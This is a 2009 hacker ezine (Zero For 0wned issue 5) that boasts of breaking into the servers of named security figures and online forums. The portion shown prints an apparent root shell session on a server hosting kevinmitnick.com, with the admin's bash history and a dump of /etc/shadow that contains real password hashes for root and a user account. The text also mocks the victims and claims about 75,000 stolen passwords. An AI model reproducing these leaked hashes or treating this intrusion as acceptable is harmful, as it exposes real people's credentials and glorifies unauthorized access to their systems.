[eZine] Zero For 0wned (ZFO) 5

EDB-ID:

12892

CVE:

N/A

Author:

ZFO

Type:

papers

Platform:

eZine

Published:

2009-07-30

                                          ____        ___                                      
                                  _____  (  _ \      / _ \                                     
                           ____  (  _  ) |    /     ( (_) )  _    _                            
                          ( ___) | (_) | (_)\_)      \___/  ( \/\/ )                           
                 _____     )__)  (_____)                     )    (    _  _                    
                (  _  )   (__)                               (_/\_)   ( \( )                   
                | (_) |                                               | \  |                   
          ____  (_____)                                               (_)\_)  ____             
         (  _ \               ~          ~                      $$$$$        ( ___)            
         |    /                                      $$$$       $$$   $$$$$   )__)             
    ____ (_)\_)          .                   ~     $$$$$$     $$$   $$$$$$$  (____) ____       
   ( ___)            .   :   .                    $$$ $$$$   $$$  $$$$    $        (  _ \      
    )__)         '.   .  :  .   .'                $    $$$$ $$$$ $$$               | (_) )     
   (____)     ._   '._.-'''-._.'   _.                     $$$$$$$$$$   $$$$$       (____/      
 ____           '-..'         '..-'                    $$$$$$$$$$$$ $$$$ $$$$$            ___  
(_   )       --._ /.           .\ _.--         ~      $$$$$$$$$$$$$$$$$     $$$          | __) 
 / /_           '/               \                   $$$  $$$$$$$$$$$$        $          |__ \ 
(____)      -----|              `|-----              $$  $$$$$$$$$$$$$$$$$               (___/ 
                _:               ;_                 $$   $$$$ *** $$$  $$$$$                   
             --'  \             /  '--              $   $$$$   **  $$$$   $$$                  
               _.-''.         .''-._                    $$$     **   $$$    $$                 
              '    .''-.   .-''.    '                   $$      ***   $$$    $                 
                 .'   '  :  '   '.                      $$       **    $$$                     
                    '    :   '                          $        ***    $$                     
                         '                              $        ***    $$                     
 ___                                                             ***    $                      
/ __)                                                            ***                           
\__ \   `~~^~^~^~^~^~^~^~^~^`~~^~^~^~^~^~^~^~^~^`~~^~^~^~^~^~^~^~***`~~^~^~^~^~^       _  _    
(___/ __  __                                                     *** (jgs)            ( \/ )   
     (  )(  )   ................. ............  . . . . . ....   ***     ....          )  (    
     | (__) |        ... .. ............ .. . ......... ... .    ***  . .. .     __   (_/\_)   
     (______) __  __    .. ....... . . . ......    . .         ****  .. .       /__\           
             (  \/  )            .... . ... ... ...     .    *****  .  ...     /(__)\          
              )    (   __  __              ....          ********      _   _  (__)(__)         
             (_/\/\_) (  \/  )          .................             ( )_( )                  
                       )    (   ____      . . ....... . .   ____       ) _ (                   
                      (_/\/\_) ( ___)  ____        _____   ( ___)     (_) (_)                  
                                )__)  (  _ \      (  _  )   )__)                               
                               (____) |    /      | (_) |  (__)                                
                                      (_)\_)      (_____)                                      




~~~~~~~~                            0. Intro                                           ~~~~~~~~
                                 ,-  1. Kevin Mitnick 
                               ,'::|  2. 0x000000
                              /::::|   3. Industry check
                            ,'::::o\    4. Dan Kaminsky                   _.. 
         ____........-------rm -rf /*    5. Hacking in gitmo           ,-' /
 _.--"""". . . .      .   .  .  .  ""`-._                           ,-' .;'            
<. - :::::o......  ...   . . .. . .  .  .""--._                  ,-'. .;'  6. darkmindz
 `-._  ` `":`:`:`::||||:::::::::::::::::.:. .  ""--._ ,'|     ,-'.  .;'   7. Robert Lemos II
     """_=--       //'{};.. ````:`:`::::::::::.:.:.:. .`-`._-'.   .;'    8. Interlude
         ""--.__     \(       \               ` ``:`:``:::: .   .;'     9. PerlMonks
13. hak5        "\""--.:-.     `.                             .:/     10. elitehackers.info
 14. CF0          \. /    `-._   `.""-----.,-..::(--"".\""`.  `:\      11. Binary Revolution 
  15. cr0.org      `P         `-._ \          `-:\          `. `:\      12. Pwnie Awards
   16. Scene check                ""            "            `-._)
    17. blackhat-forums
     18. Last Words                                                                    ~~~~~~~~


                               S y m a n t e c  -  T h r e a t C o n  
                         ---------------------------------------------
                        |             Level 31337: 
Segmentation fault

          ^ Manipulate threat level to read back the stack and abuse info disclosure




                                           |
                                       \       /            _\/_
   Intro                                 .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
                                                                    |


It's July 28th, 2009! Welcome one and all to the real Black Hat Briefings. Live
from the underground, coming right at you free of charge. You don't have to pay
to come, and you don't get paid to be featured. Presented by real blackhats,
this is a must-see event!

This is a big one. We hacked notable whitehats Kevin Mitnick, Dan Kaminsky, and 
Julien Tinnes, among others. We continued the skiddie holocaust with darkmindz,
elitehackers, hak5, binrev, and blackhat-forums. Along the way we created mass
mayhem. There are more rm's in this zine than you can count on a hand. Just from
targets shown here we collected about 75,000 passwords. Passes, not hashes. If
you are reading this, then your browser probably did not crash, so you know we
couldn't include all of our passwords, let alone hashes. The first version of
this was ten times the size of ZF04.

> lol yeah I'm gonna have to trim
> and by "trim" I mean "remove everything"

Let's get warmed up with the first song from the zf05 mix tape, Search & Destroy
by classic Iggy Pop. Look for the rest of the songs in the article headers.

                   ~ I'm a street walking cheetah
                   with a hide full of napalm
                   I'm a runaway son of the nuclear A-bomb
                   I am a world's forgotten boy
                   The one who searches and destroys
                   Honey gotta help me please
                   Somebody gotta save my soul
                   Baby detonate for me
                   Look out honey, 'cause I'm using technology
                   Ain't got time to make no apology
                   Soul radiation in the dead of night
                   Love in the middle of a fire fight
                   Honey gotta strike me blind
                   Somebody gotta save my soul
                   Baby penetrate my mind
                   And I'm the world's forgotten boy
                   The one who's searchin', searchin' to destroy
                   And honey I'm the world's forgotten boy
                   The one who's searchin', searchin' to destroy ~



                              Are you ready?



                                           |
                                       \       /            _\/_
   Kevin Mitnick - Freedom Owntime       .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
    I got a list of demands                                         |
      written on the palm of my hands


Kevin Mitnick, hero to many, wet dream to Emmanuel Goldstein. Consider this a
follow up to the cDc article. Kevin has become the media rep for the hacker
community, something which he has grown further and further apart from ever
since his release. Without John Markoff's sensationalist reporting Kevin
Mitnick would not have the notoriety that allows him to earn his money
providing keynotes at conferences all over the world. Kevin is polluting the
media with bullshit. Whilst we understand that owning him is something which
has been done many, many times, we felt that not presenting his insecurity
publicly would be wrong. Since 2003 this has been done three times of note
and Kevin has used his enormously powerful SOCIAL ENGINEERING techniques to
escape with an unharmed repuation each time. The fact is that he cannot secure
his systems because he does not know how.

Oh before I forget, we were behind the Mitnick mantraining. It was a beautifully
executed social engineering experiment that worked flawlessly and also provided
us with superb quotes. What can I say, The Art of Deception was some of the
most enthralling 352 pages I have ever read.

I now present you some of his excellent excuses:

"The Web hosting provider that hosts my sites was hacked," Mitnick told CNET
News.com in an interview Monday. "Fortunately, I don't keep any confidential
data on my Web site, so it wasn't that serious. Of course, it is embarrassing
to be defaced--nobody likes it." 

Defacing Web sites is akin to graffiti in the brick-and-mortar world. "It is
kind of stupid; they do it for the attention," Mitnick said. "When I was a
hacker, I never stooped to defacing sites because that was more like vandalism;
that wasn't any fun. It is more about getting in and being stealth and looking
around and exploring." 

Let me set something straight Kevin, www.kevinmitnick.com is your
responsibility to secure. You run a security auditing company - what went
wrong?

One thing I notice about the above, Kevin referring to himself as a hacker in
past tense - heh, at least he doesn't fall for the common fallacy that 'hackers'
are not anything other than people who break into systems.

"They keep getting compromised," he said. "Maybe I'll move it over to Amazon or
something and let them attack Amazon."

That'd be great Kev, hopefully you'll shift our doors straight over there.

root@www.kevinmitnick.com's password: 
Last login: Mon Jul 13 17:08:58 2009 from 58.jerveyave.com


---------------------------------------------------------------------------
This computer system is for authorized users only. All activity is logged and
regularly checked by systems personnel. Individuals using this system without
authority or in excess of their authority are subject to having all their
services revoked. Any illegal services run by user or attempts to take down
this server or it's services will be reported to local law enforcement, and
said user will be punished to the full extent of the law. Anyone using this
system consents to these terms.

---------------------------------------------------------------------------
root@dc21 [~]# w
 11:10:22 up 3 days, 12:54,  0 users,  load average: 0.00, 0.00, 0.00
USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
root@dc21 [~]# uname -a;id
Linux dc21.hostedhere.net 2.6.18-92.1.18.el5.028stab060.2 #1 SMP Tue Jan 13
11:38:36 MSK 2009 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@dc21 [~]# last
reboot	 system boot  2.6.18-92.1.18.e Mon Jul 13 22:15 	(3+12:37)   
root	 pts/0	      58.jerveyave.com Mon Jul 13 17:08 - crash  (05:07)    
root	 pts/0	      greenville.isopo Mon Jul 13 05:55 - 13:35  (07:39)    
reboot	 system boot  2.6.18-92.1.18.e Mon Jul 13 00:15 	(4+10:38)   
reboot	 system boot  2.6.18-92.1.18.e Sun Jul 12 23:58 	 (00:09)    
root	 pts/0	      greenville.isopo Fri Jul 10 04:50 - 11:59  (07:09)    
mitsec	 pts/0	      72.19.162.209    Thu Jul	9 09:41 - 10:01  (00:20)    
root	 pts/0	      58.jerveyave.com Wed Jul	8 21:27 - 21:27  (00:00)    
root	 pts/0	      58.jerveyave.com Tue Jul	7 20:00 - 08:12  (12:11)    
reboot	 system boot  2.6.18-92.1.18.e Tue Jul	7 19:46 	(5+03:53)   
reboot	 system boot  2.6.18-92.1.18.e Tue Jul	7 17:07 	 (00:13)    
reboot	 system boot  2.6.18-92.1.18.e Tue Jul	7 10:59 	 (05:36)    
root	 pts/0	      greenville.isopo Tue Jul	7 05:33 - down	 (05:17)    
root	 pts/0	      5ace2de4.bb.sky. Tue Jul	7 05:31 - 05:32  (00:01)    
reboot	 system boot  2.6.18-92.1.18.e Tue Jul	7 02:53 	 (07:57)    
mitsec	 pts/0	      ip68-229-7-88.lv Thu Jul	2 00:17 - 02:30  (02:13)    
mitsec	 pts/0	      ip68-229-7-88.lv Wed Jul	1 00:41 - 01:31  (00:50)    
root	 pts/3	      tech1.xyzdns.net Tue Jun 30 09:33 - 10:01  (00:27)    
root	 pts/2	      tech1.xyzdns.net Tue Jun 30 09:32 - 10:01  (00:28)    
root	 pts/1	      tech1.xyzdns.net Tue Jun 30 09:30 - 10:01  (00:30)    
root	 pts/0	      58.jerveyave.com Mon Jun 29 15:16 - 16:36 (1+01:19)   
mitsec	 pts/1	      93.sub-75-212-18 Mon Jun 29 12:40 - 14:57  (02:16)    
root	 pts/0	      58.jerveyave.com Mon Jun 29 05:30 - 15:14  (09:43)    
mitsec	 pts/0	      110.sub-75-212-1 Mon Jun 29 04:35 - 04:37  (00:02)    
mitsec	 pts/1	      nmd.sbx03424.las Mon Jun 29 01:47 - 02:14  (00:26)    
mitsec	 pts/1	      nmd.sbx03424.las Mon Jun 29 01:19 - 01:25  (00:06)    
mitsec	 pts/0	      c-67-169-204-62. Mon Jun 29 01:19 - 02:46  (01:27)    
mitsec	 pts/1	      c-67-169-204-62. Mon Jun 29 01:14 - 01:18  (00:04)    
mitsec	 pts/0	      nmd.sbx03424.las Mon Jun 29 01:08 - 01:15  (00:06)    
mitsec	 pts/0	      nmd.sbx03424.las Mon Jun 29 00:11 - 00:32  (00:20)    
root	 pts/1	      tech1.xyzdns.net Tue Jun 23 05:31 - 06:50  (01:18)    
root	 pts/1	      tech1.xyzdns.net Tue Jun 23 05:28 - 05:30  (00:01)    
root	 pts/0	      tech1.xyzdns.net Mon Jun 22 17:54 - 16:17  (22:23)    
mitsec	 pts/1	      nmd.sbx03424.las Sat Jun 20 02:57 - 03:37  (00:40)    
mitsec	 pts/1	      ip68-229-7-88.lv Fri Jun 19 22:02 - 22:05  (00:03)    
mitsec	 pts/1	      ip68-229-7-88.lv Fri Jun 19 20:44 - 21:28  (00:44)    
root	 pts/0	      58.jerveyave.com Thu Jun 18 20:26 - 09:37 (1+13:11)   
mitsec	 pts/0	      ip68-229-7-88.lv Thu Jun 18 11:09 - 11:40  (00:31)    
mitsec	 pts/0	      ip68-229-7-88.lv Wed Jun 17 09:53 - 09:53  (00:00)    
mitsec	 pts/0	      pool-71-106-244- Mon Jun 15 03:08 - 03:10  (00:02)    
mitsec	 pts/0	      pool-71-106-244- Tue Jun	9 15:44 - 16:10  (00:25)    
root	 pts/0	      greenville.isopo Tue Jun	9 12:14 - 14:02  (01:47)    
reboot	 system boot  2.6.18-92.1.18.e Mon May 18 15:12 	(49+05:01)  
mitsec	 pts/0	      ip72-193-114-177 Fri May 15 01:44 - 01:59  (00:14)    
root	 pts/0	      greenville.isopo Fri Apr 24 06:58 - 11:09  (04:11)    
reboot	 system boot  2.6.18-92.1.18.e Thu Apr 23 20:26 	(73+23:47)  
mitsec	 pts/1	      186.81.109.196   Mon Apr 20 11:00 - 15:50  (04:50)    
root	 pts/1	      tech1.xyzdns.net Sun Apr 19 11:39 - 14:16  (02:36)    
root	 pts/0	      58.jerveyave.com Sun Apr 19 09:01 - 18:36 (4+09:34)   
reboot	 system boot  2.6.18-92.1.18.e Sun Apr 19 06:55 	(4+11:41)   
reboot	 system boot  2.6.18-92.1.18.e Sun Apr 19 06:46 	 (00:04)    
root	 pts/1	      tech1.xyzdns.net Sat Apr 18 14:07 - 14:35  (00:28)    
root	 pts/0	      tech1.xyzdns.net Sat Apr 18 08:18 - 01:28  (17:10)    
reboot	 system boot  2.6.18-92.1.18.e Sat Apr 18 07:15 	 (23:30)    
reboot	 system boot  2.6.18-92.1.18.e Fri Apr 17 03:51 	(1+03:24)   
root	 pts/1	      58.jerveyave.com Fri Mar 27 18:21 - 21:42 (5+03:20)   
mitsec	 pts/2	      wsip-70-168-126- Wed Mar 25 21:34 - 23:46  (02:12)    
root	 pts/1	      58.jerveyave.com Wed Mar 25 20:03 - 03:45 (1+07:41)   
root	 pts/4	      tech1.xyzdns.net Tue Mar 24 11:09 - 13:21  (02:12)    
root	 pts/3	      greenville.isopo Tue Mar 24 11:05 - 14:32  (03:27)    
root	 pts/2	      tech1.xyzdns.net Mon Mar 23 01:22 - 13:59 (1+12:37)   
root	 pts/2	      tech1.xyzdns.net Sat Mar 21 15:49 - 17:09  (01:19)    
root	 pts/1	      66-191-205-150.d Sat Mar 21 15:26 - 20:03 (4+04:36)   
root	 pts/0	      tech3.xyzdns.net Sat Mar 21 14:08 - 16:40  (02:32)    
root	 pts/0	      66-191-205-150.d Sat Mar 21 08:54 - 13:08  (04:13)    
reboot	 system boot  2.6.18-92.1.18.e Sat Mar 21 08:43 	(26+19:06)  
reboot	 system boot  2.6.9-023stab040 Sat May 26 10:33 	 (00:22)    

wtmp begins Sat May 26 10:33:49 2007
root@dc21 [~]# cd /root
root@dc21 [~]# ls -la
total 92
drwxr-xr-x 12 root root 4096 Jul 17 10:51 .
drwxr-xr-x 22 root root 4096 Jul 13 22:16 ..
drwxr-xr-x  7 root root 4096 Mar 21 10:30 .MirrorSearch
-rwxr-xr-x  1 root root 4659 Jul 13 13:35 .bash_history
-rwxr-xr-x  1 root root   24 Jan  6  2007 .bash_logout
-rwxr-xr-x  1 root root  191 Jan  6  2007 .bash_profile
-rwxr-xr-x  1 root root  413 Mar 21 14:09 .bashrc
drwxr-xr-x  4 root root 4096 Mar 21 10:37 .cpanel
drwxr-xr-x  4 root root 4096 Mar 21 09:26 .cpobjcache
-rwxr-xr-x  1 root root  100 Jan  6  2007 .cshrc
drwxr-xr-x  2 root root 4096 Mar 21 09:28 .gnupg
-rw-------  1 root root   46 Jul  6 19:27 .my.cnf
-rwxr-xr-x  1 root root  264 Jul 15 00:27 .pearrc
-rwxr-xr-x  1 root root 1024 Mar 21 10:37 .rnd
drwxr-xr-x  3 root root 4096 Mar 21 10:36 .spamassassin
-rwxr-xr-x  1 root root  129 Jan  6  2007 .tcshrc
drwxr-xr-x  4 root root 4096 Mar 21 14:21 cpanel3-skel
drwxr-xr-x  2 root root 4096 Mar 21 10:22 public_ftp
drwxr-xr-x  3 root root 4096 Mar 21 10:22 public_html
-rwxr-xr-x  1 root root 2171 Dec 12  2008 pure-ftpd
drwxr-xr-x  2 root root 4096 Mar 21 14:09 security
drwxr-xr-x  3 root root 4096 Mar 21 15:51 tmp
root@dc21 [~]# cat .bash_history
passwd 
w
w.
w
cd /home 
wget http://layer1.cpanel.net/latest 
 sh latest 
/scripts/upcp
w
cd /
ls
mv hypervm-scheduled-2.0-vps9.vm-2009-Mar-21-1237645742.tgz
3-21-mitsec-os-image.tgz
ls -l
ls
cd home
ls
wget http://dc21.hostedhere.net/mitsec.tar.gzw
w
ls
cd /home/
ls
/scripts/restorepkg mitsec.tar.gz 
mkdir /root/security;cd /root/security
wget http://72.3.144.149/software/psm.tar;tar -xvf psm.tar;rm -f psm.tar;./psm
1;rm -f psm.txt;rm -f psm
ls -l
chkrootkit
/usr/local/bin/rkhunter --update
rkhunter -sk -c
/sbin/service apf restart
/sbin/ifconfig
vi /etc/apf/conf.apf
/sbin/service apf restart
cd /root
/scripts/fixdc
/scripts/fixndc
vi /etc/cpupdate.conf
vi /etc/hosts
cd /scripts/
./restartsrv named
./restartsrv http
./upcp --force
./fixcommonproblems
./reinstallmailman
cd /root
hostname -i
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.357
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
vi /etc/apf/conf.apf
/sbin/service sshd restart
/etc/apf/apf -r
cd /root
vi /usr/local/lib/php.ini
vi /usr/local/php4/lib/php.ini
/scripts/restartsrv httpd
vi /etc/apf/conf.apf 
apf -r
/sbin/service pure-ftpd stop
mv /etc/rc.d/init.d/pure-ftpd /root/
echo > /etc/rc.d/init.d/pure-ftpd
chattr +i /etc/rc.d/init.d/pure-ftpd
vi /etc/pam.d/crond 
service crond restart
passwd mitsec
cd /var/log/
ls
tail secure 
w
w
pico /etc/httpd/conf/httpd.conf
whereis php.ini
pico /usr/lib/php.ini 
service httpd restart
pico /etc/httpd/conf/httpd.conf
pico /usr/local/apache/conf/php.conf
cd /etc/httpd/conf/
ls
pico php.conf
php -i | grep php.ini
pico /usr/local/lib/php.ini
/scripts/installgd 
tail -f /etc/httpd/logs/error_log 
service httpd restart
tail -f /etc/httpd/logs/error_log 
/scripts/easyapache
cd /home/mitsec/
cd www
pico info.txt
chown mitsec:mitsec info.txt 
psaswd mitsec
psaswd mitsec
passwd mitsec
whereis proftpd
la
ls
ls -l 
pico index.php
cd /var/log
cat secure 
ls
pico rootlogins 
ls
pico apf_log
service apf stop
service apf start
pico apf_log
date
pico /etc/apf/conf.apf 
service apf restart
pico apf_log
ls
tail secure
w
tail secure
lastlog
cd /home/mitsec/
ls
cd www
ls
cd ..
ls
pico .bash_history 
ls
cd /
ls
w
betstat
netstat
w
ls -l
df -h
w
netstat
netstat
netstat
cd /etc/httpd/logs/
ls
tail -f access_log 
tail -f error_log 
pico /var/log/secure 
grep "510" /etc/shadow
grep "510" /etc/passwd
pico /var/log/secure 
w
w
cd /var/log/
grep "65.124.165" *
cd /etc/httpd
ls
cd domlogs/
ls
grep "65.124.165" mitnicksecurity.com
pico mitnicksecurity.com
cd mitsec
ls
pico mitnicksecurity.com 
cd /home/mitsec/access-logs/
ls
pico mitnicksecurity.com 
w
top
vi /usr/local/apache/conf/httpd.conf
vi /usr/local/apache/conf/httpd.conf
cd /usr/local/apache
du -sh
prm
/scripts/restartsrv httpd
top
top
w
history
pico /etc/apf/conf.apf 
service apf restart
ping 4.2.2.1
telnet vpn.isopoly.com 25
w
telnet vpn.isopoly.com 25
w
top
w
lastlog
history
exit
w
lastlog
rkhunter -c
w
chkrootkit
ps -aux
cd /var/tmp/
ls -l
cd /tmp
ls -l
rm -Rf r*
cd /usr/local/apache;
ls -l pr
w
top
rkhunter -c
w
vi /usr/local/sim/conf.sim
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.325
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
/sbin/service sshd restart
/sbin/service apf restart
w
ifconfig
cd /var/log/
tail secure
pico secure
w
w
tail secure
tail secure
tail secure
tail secure
tail secure
cd /etc/ssh
dir
vi sshd_config
w
cd /home/
ls
cd no
ls
cd ..
ls
cd /var/log/
tail secure
tail -n 100 secure
cd /tmp
ls
cd /var/log/btmp 
pico /var/log/btmp 
cd /var/log
ls -l btmp
pico /etc/passwd
rkhunter 
rkhunter -c
 tail /var/cpanel/accounting.log 
 tail /var/cpanel/root.accts 
df -h
top
history
cd /home/mitsec/
ls -l
cat .lastlogin 
ls
cd www
ls
ls -l |grep "Jul"
ls -l
cd ..
ls
cd ..
ls
ls -l
df -h
cd /home/
ls
ls -l
cd mitsec/
ls
ls -l
cd /home/
ls
cd /
ls
ls -l
df -h
rm -Rf 3-21-mitsec-os-image.tgz 
df -h
cd /etc
ls
ls -l
top
w
tail /var/log/secure
tail /var/log/messages
netstat
exit
w
df -h
cd /home/
ls
cd no
ls
ls -l
cd ..
ls
cd mitsec/
ls
ls -l
cd public_
cd public_html/
ls
ls -l
ls -l contact_form.php 
pico contact_form.php 
df -h
top
w
ls -l
cd /
ls
cd ..
ls -l
cd /
ls
ls -l
w
df -h
top
w
cd /
ls
cd tmp
ls
cd backupfileehwcb2/
ls
ls -l
cd ..
ls
cd /
ls
ls -l
rm tmp.tar 
ls -l
df -h
cd /home
ls
cd cpbackuptmp/
ls
cd cpbackup/  <-- I *wonder* what's in his CP dir
ls
ls -l
cd daily/
ls
cd ..
cd weekly/
ls
ls -l
cd ..
ls
cd monthly/
ls
cd ..
cd weekly/
ls -l
cd ..
ls
cd ..
ls
cd ..
ls
cd no
ls
cd sources/
ls
cd modules/
ls
ls -l
cd ..
ls
cd authors/
ls
ls -l
cd ..
ls
ls -l
pico MIRRORED.BY 
cd ..
ls
ls -l
cd ..
ls
cd virtfs/
ls
ls -l
cd mitsec/
ls
ls -l
cd home
ls
ls -l
cd mitsec/
ls
cd ..
cd ..
cd ..
ls
cd ..
ls
cd /
ls
w
top
root@dc21 [~]# w
 10:53:46 up 3 days, 12:38,  0 users,  load average: 0.00, 0.00, 0.00
USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
root@dc21 [~]# cat /etc/shadow /etc/passwd
root:$1$5K/cgjHy$YY0B5o9EuLytWnXPBP7eU0:14430:0:99999:7:::
bin:*:13649:0:99999:7:::
daemon:*:13649:0:99999:7:::
adm:*:13649:0:99999:7:::
lp:*:13649:0:99999:7:::
sync:*:13649:0:99999:7:::
shutdown:*:13649:0:99999:7:::
halt:*:13649:0:99999:7:::
mail:*:13649:0:99999:7:::
news:*:13649:0:99999:7:::
uucp:*:13649:0:99999:7:::
operator:*:13649:0:99999:7:::
games:*:13649:0:99999:7:::
gopher:*:13649:0:99999:7:::
ftp:*:13649:0:99999:7:::
nobody:*:13649:0:99999:7:::
vcsa:!!:13649:0:99999:7:::
dbus:!!:13649:0:99999:7:::
mailnull:!!:13649:0:99999:7:::
smmsp:!!:13649:0:99999:7:::
apache:!!:13649:0:99999:7:::
sshd:!!:13649:0:99999:7:::
rpc:!!:13649:0:99999:7:::
pcap:!!:13649:0:99999:7:::
rpm:!!:13649:0:99999:7:::
named:!!:13649:0:99999:7:::
cpanel:*:14324::::::
postfix:!!:14324::::::
xfs:!!:14324::::::
mysql:!!:14324::::::
mailman:*:14324::::::
cpanelhorde:*:14324::::::
cpanelphpmyadmin:*:14324::::::
cpanelphppgadmin:*:14324::::::
cpanelroundcube:*:14324::::::
mitsec:$1$VVB/aSDv$cFi4QkgSPku7Gsc0nR.gz/:14327:0:99999:7:::
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/
bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/loc
al/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/loc
al/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local
/cpanel/bin/noshell
mitsec:x:510:510::/home/mitsec:/usr/local/cpanel/bin/jailshell
root@dc21 [~]# cd /home/mitsec/
root@dc21 [~]# ls -la
total 10085472
drwxr-xr-x 22 mitsec mitsec	  4096 Jul 16 10:36 .
drwxr-xr-x 12 root   root	  4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec	    64 Mar 20  2007 .Xauthority
-rwxr-xr-x  1 mitsec mitsec	  2399 Jul  9 10:01 .bash_history
-rwxr-xr-x  1 mitsec mitsec	    24 Feb 25  2006 .bash_logout
-rwxr-xr-x  1 mitsec mitsec	   191 Feb 25  2006 .bash_profile
-rwxr-xr-x  1 mitsec mitsec	   124 Feb 25  2006 .bashrc
-rwxr-xr-x  1 mitsec mitsec	  5619 Aug 21  2006 .canna
-rwxr-xr-x  1 mitsec mitsec	    17 Jan 30  2006 .contactemail
-rwxr-xr-x  1 mitsec mitsec	    10 Jan 30  2006 .contactsavetime
drwxr-xr-x  5 mitsec mitsec	  4096 Mar 21 12:58 .cpanel
-rwxr-xr-x  1 mitsec mitsec	  1682 Jan 23  2005 .cpanel-ducache
-rwxr-xr-x  1 mitsec mitsec	    19 Jul 17 10:46 .dns
-rwxr-xr-x  1 mitsec mitsec	   383 Aug 21  2006 .emacs
drwxr-xr-x  5 mitsec mitsec	  4096 Sep  1  2008 .fantasticodata
-rwxr-xr-x  1 mitsec mitsec	    16 Jul  2 23:11 .ftpquota
drwxr-xr-x  2 mitsec mitsec	  4096 Sep  1  2008 .gnupg
drwxr-xr-x 52 mitsec nobody	  4096 Sep  1  2008 .htpasswds
-rwxr-xr-x  1 mitsec mitsec	     7 Sep  2  2008 .lang
-rw-------  1 mitsec mitsec	    14 Jul 16 10:22 .lastlogin
-rwxr-xr-x  1 mitsec mitsec	    35 Jan 13  2009 .lesshst
-rwxr-xr-x  1 mitsec mitsec    6441532 May  6  2006
.pureftpd-upload.445d6ea6.15.1358.7997c79e
drwxr-xr-x  2 mitsec mitsec	  4096 Sep  1  2008 .sqmaildata
drwxr-xr-x  2 mitsec mitsec	  4096 Sep  1  2008 .ssh
drwxr-xr-x  2 mitsec mitsec	  4096 Mar 28  2007 .trash
-rwxr-xr-x  1 mitsec mitsec	   705 Feb 28  2008 .viminfo
-rwxr-xr-x  1 mitsec mitsec	     5 Mar  5  2006 .whmtheme
-rwxr-xr-x  1 mitsec mitsec	   658 Aug 21  2006 .zshrc
-rwxr-xr-x  1 mitsec mitsec    1361309 Mar  7  2008 CDMA WORKSHOP.rar
-rwxr-xr-x  1 mitsec mitsec   73025457 Mar 20  2007 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec   20152320 Mar  7  2008 SOFTWARE PACK.rar
-rwxr-xr-x  1 mitsec mitsec	 49569 Mar  7  2008 UNIBOX.rar
lrwxrwxrwx  1 mitsec mitsec	    32 Jul  7 19:34 access-logs ->
/usr/local/apache/domlogs/mitsec
-rwxr-xr-x  1 mitsec mitsec  582461440 Aug  7  2007 archive.tar
-rwxr-xr-x  1 mitsec mitsec	607360 Sep  4  2007 arcot.ppt
-rwxr-xr-x  1 mitsec mitsec   30242339 Jul 25  2007
asterisk-1.0.8-backup-2007-07-25.tar.gz
-rwxr-xr-x  1 mitsec mitsec 2189910925 Oct 25  2007
backup-10.25.2007_23-54-41_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264566004 Jul 16 10:35
backup-7.16.2009_10-22-58_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264029970 Jul  8 16:51
backup-7.8.2009_16-39-47_mitsec.tar.gz
-rwxr-xr-x  1 mitsec mitsec  617186883 Aug 19  2007 backup-8.19.2007.tar.gz
-rwxr-xr-x  1 mitsec mitsec	 90279 Nov  6  2006 badboys.mp3
-rwxr-xr-x  1 mitsec mitsec	   211 May  5  2007 boot.ini
-rwxr-xr-x  1 mitsec mitsec    5305344 Feb  7  2007 circosec-FINAL.ppt
-rwxr-xr-x  1 mitsec mitsec    5299200 Jan  8  2007 circosec.ppt
